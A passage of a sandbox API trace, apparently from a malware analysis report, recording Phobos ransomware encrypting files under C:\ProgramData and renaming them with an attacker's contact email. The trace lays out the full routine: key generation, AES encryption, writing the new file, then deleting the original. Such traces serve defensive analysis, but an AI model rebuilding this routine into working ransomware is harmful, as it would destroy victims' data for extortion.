(lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0165.737] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.737] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0165.737] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0165.737] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=60533) returned 1 [0165.737] CloseHandle (hObject=0x17c) returned 1 [0165.737] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico")) returned 0x20 [0165.738] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0165.738] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.738] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0165.738] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0165.738] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=67156) returned 1 [0165.738] CloseHandle (hObject=0x17c) returned 1 [0165.738] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico")) returned 0x20 [0165.738] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0165.738] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.738] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0165.738] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0165.739] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=63682) returned 1 [0165.739] CloseHandle (hObject=0x17c) returned 1 [0165.739] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico")) returned 0x20 [0165.739] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0165.739] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.739] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0165.739] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll" (normalized: "c:\\programdata\\microsoft\\identitycrl\\ppcrlconfig.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0165.742] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=15616) returned 1 [0165.742] CloseHandle (hObject=0x17c) returned 1 [0165.742] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll" (normalized: "c:\\programdata\\microsoft\\identitycrl\\ppcrlconfig.dll")) returned 0x20 [0165.742] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\identitycrl\\ppcrlconfig.dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0165.742] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll" (normalized: "c:\\programdata\\microsoft\\identitycrl\\ppcrlconfig.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0165.742] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0165.742] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0165.743] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\identitycrl\\ppcrlconfig.dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0165.744] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32da8) returned 1 [0165.745] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0165.745] ReadFile (in: hFile=0x17c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x3d00, lpOverlapped=0x0) returned 1 [0165.781] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x3d10, dwBufLen=0x3d10 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x3d10) returned 1 [0165.781] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x3d10, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x3d10, lpOverlapped=0x0) returned 1 [0165.782] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ca8) returned 1 [0165.782] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0165.782] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0165.782] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0165.782] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0165.783] CryptDestroyKey (hKey=0xa32da8) returned 1 [0165.783] CloseHandle (hObject=0x17c) returned 1 [0165.783] CloseHandle (hObject=0x130) returned 1 [0165.783] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll" (normalized: "c:\\programdata\\microsoft\\identitycrl\\ppcrlconfig.dll")) returned 1 [0165.784] SetEvent (hEvent=0xe8) returned 1 [0165.784] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0165.784] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll" (normalized: "c:\\programdata\\microsoft\\identitycrl\\ppcrlui.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0165.785] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=254216) returned 1 [0165.785] CloseHandle (hObject=0x130) returned 1 [0165.785] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll" (normalized: "c:\\programdata\\microsoft\\identitycrl\\ppcrlui.dll")) returned 0x20 [0165.785] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\identitycrl\\ppcrlui.dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0165.785] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll" (normalized: "c:\\programdata\\microsoft\\identitycrl\\ppcrlui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0165.785] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0165.785] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0165.785] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\identitycrl\\ppcrlui.dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0165.786] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32da8) returned 1 [0165.786] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0165.786] ReadFile (in: hFile=0x130, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x3e108, lpOverlapped=0x0) returned 1 [0165.816] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x3e110, dwBufLen=0x3e110 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x3e110) returned 1 [0165.819] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x3e110, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x3e110, lpOverlapped=0x0) returned 1 [0165.822] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ca8) returned 1 [0165.822] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0165.822] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0165.822] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0165.822] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0165.822] CryptDestroyKey (hKey=0xa32da8) returned 1 [0165.822] CloseHandle (hObject=0x130) returned 1 [0165.822] CloseHandle (hObject=0x17c) returned 1 [0165.823] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll" (normalized: "c:\\programdata\\microsoft\\identitycrl\\ppcrlui.dll")) returned 1 [0165.825] SetEvent (hEvent=0xe8) returned 1 [0165.825] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0165.825] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Active.GRL" (normalized: "c:\\programdata\\microsoft\\mf\\active.grl"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0165.825] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=14972) returned 1 [0165.825] CloseHandle (hObject=0x17c) returned 1 [0165.825] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Active.GRL" (normalized: "c:\\programdata\\microsoft\\mf\\active.grl")) returned 0x20 [0165.825] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Active.GRL.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\mf\\active.grl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0165.825] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Active.GRL" (normalized: "c:\\programdata\\microsoft\\mf\\active.grl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0165.825] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0165.825] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0165.825] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Active.GRL.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\mf\\active.grl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0165.826] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32da8) returned 1 [0165.826] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0165.826] ReadFile (in: hFile=0x17c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x3a7c, lpOverlapped=0x0) returned 1 [0165.871] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x3a80, dwBufLen=0x3a80 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x3a80) returned 1 [0165.871] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x3a80, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x3a80, lpOverlapped=0x0) returned 1 [0165.872] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32c68) returned 1 [0165.872] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0165.872] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0165.872] CryptDestroyKey (hKey=0xa32c68) returned 1 [0165.872] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0165.872] CryptDestroyKey (hKey=0xa32da8) returned 1 [0165.872] CloseHandle (hObject=0x17c) returned 1 [0165.872] CloseHandle (hObject=0x130) returned 1 [0165.872] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Active.GRL" (normalized: "c:\\programdata\\microsoft\\mf\\active.grl")) returned 1 [0165.873] SetEvent (hEvent=0xe8) returned 1 [0165.873] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0165.873] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico" (normalized: "c:\\programdata\\microsoft\\office\\assetlibrary.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0165.874] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=5430) returned 1 [0165.874] CloseHandle (hObject=0x130) returned 1 [0165.874] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico" (normalized: "c:\\programdata\\microsoft\\office\\assetlibrary.ico")) returned 0x2020 [0165.874] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\assetlibrary.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0165.874] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico" (normalized: "c:\\programdata\\microsoft\\office\\assetlibrary.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0165.874] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0165.874] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0165.874] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\assetlibrary.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0165.874] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32da8) returned 1 [0165.874] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0165.874] ReadFile (in: hFile=0x130, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x1536, lpOverlapped=0x0) returned 1 [0165.911] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1540, dwBufLen=0x1540 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1540) returned 1 [0165.911] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x1540, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x1540, lpOverlapped=0x0) returned 1 [0165.912] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa327e8) returned 1 [0165.912] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0165.912] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0165.912] CryptDestroyKey (hKey=0xa327e8) returned 1 [0165.912] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0165.913] CryptDestroyKey (hKey=0xa32da8) returned 1 [0165.913] CloseHandle (hObject=0x130) returned 1 [0165.913] CloseHandle (hObject=0x17c) returned 1 [0165.913] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico" (normalized: "c:\\programdata\\microsoft\\office\\assetlibrary.ico")) returned 1 [0165.914] SetEvent (hEvent=0xe8) returned 1 [0165.914] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0165.915] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySharePoints.ico" (normalized: "c:\\programdata\\microsoft\\office\\mysharepoints.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0165.915] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=348974) returned 1 [0165.915] CloseHandle (hObject=0x17c) returned 1 [0165.915] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySharePoints.ico" (normalized: "c:\\programdata\\microsoft\\office\\mysharepoints.ico")) returned 0x2020 [0165.915] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySharePoints.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\mysharepoints.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0165.915] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySharePoints.ico" (normalized: "c:\\programdata\\microsoft\\office\\mysharepoints.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, 